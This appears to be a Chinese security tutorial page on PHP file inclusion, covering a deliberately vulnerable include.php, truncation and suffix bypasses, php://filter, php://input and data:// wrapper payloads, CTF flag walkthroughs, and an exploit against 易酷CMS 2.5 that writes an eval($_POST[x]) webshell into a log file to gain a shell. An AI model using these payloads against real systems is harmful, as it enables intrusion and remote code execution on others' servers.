php文件包含

文件包含

    • 文件包含
    • 跨目录包含
    • 受限制的包含
    • 远程文件包含
    • 文件包含伪协议玩法
    • 南邮CTF文件包含
    • i春秋文件包含CTF
    • 易酷CMS本地文件包含

文件包含

include.php
php文件包含_第1张图片
1.txt


访问地址:127.0.0.1:8080/include.php?filenmae=1.txt
执行php效果
php文件包含_第2张图片

跨目录包含

php文件包含_第3张图片

受限制的包含


$file = $_GET['filename'];
include($file.".html");
?>

php文件包含_第4张图片
从报错信息得知在包含的文件后添加了.html
解决方法:

  1. 00截断 前提php版本小于5.3.4
    php文件包含_第5张图片

  2. 长度截断:条件:windows,点号需要长于256;linux 长于4096
    php文件包含_第6张图片

远程文件包含

在php.ini文件中allow_url_include设为on就开启远程包含
php文件包含_第7张图片
远程包含
php文件包含_第8张图片
远程包含绕过后缀添加.html
php文件包含_第9张图片
后缀添加?号
php文件包含_第10张图片

添加%23
php文件包含_第11张图片

文件包含伪协议玩法

文件读取
http://127.0.0.1:8080/include.php?filename=php://filter/convert.base64-encode/resource=1.txt
php文件包含_第12张图片

执行系统命令
http://127.0.0.1:8080/include.php?filename=php://input Post:
写入一句话后门:’);?>
php文件包含_第13张图片

file协议读取文件
php文件包含_第14张图片

第二种执行代码:http://127.0.0.1:8080/include.php?filename=data://text/plain,
php文件包含_第15张图片

南邮CTF文件包含

http://4.chinalover.sinaapp.com/web7/index.php?
php文件包含_第16张图片
根据名字判断可能是文件包含
php文件包含_第17张图片
直接文件读取伪协议
php://filter/convert.base64-encode/resource=index.php
php文件包含_第18张图片
base64解密,拿取flag
php文件包含_第19张图片

i春秋文件包含CTF

php文件包含_第20张图片
执行命令
php文件包含_第21张图片
读取文件:获取flag
php文件包含_第22张图片

易酷CMS本地文件包含

查询该CMS漏洞情况:

易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件,再用菜刀连接拿shell。

http://192.168.10.22/index.php?s=my/show/id/{~eval($_POST[x])} 写入日志文件一句话
php文件包含_第23张图片
本地日志文件就写入一句话
该日志是以时间日期命名的,用菜刀连接该日志文件,得到shell
http://192.168.10.22/index.php?s=my/show/id/…\temp\logs\21_06_6.log

你可能感兴趣的:(小迪安全笔记,网络安全)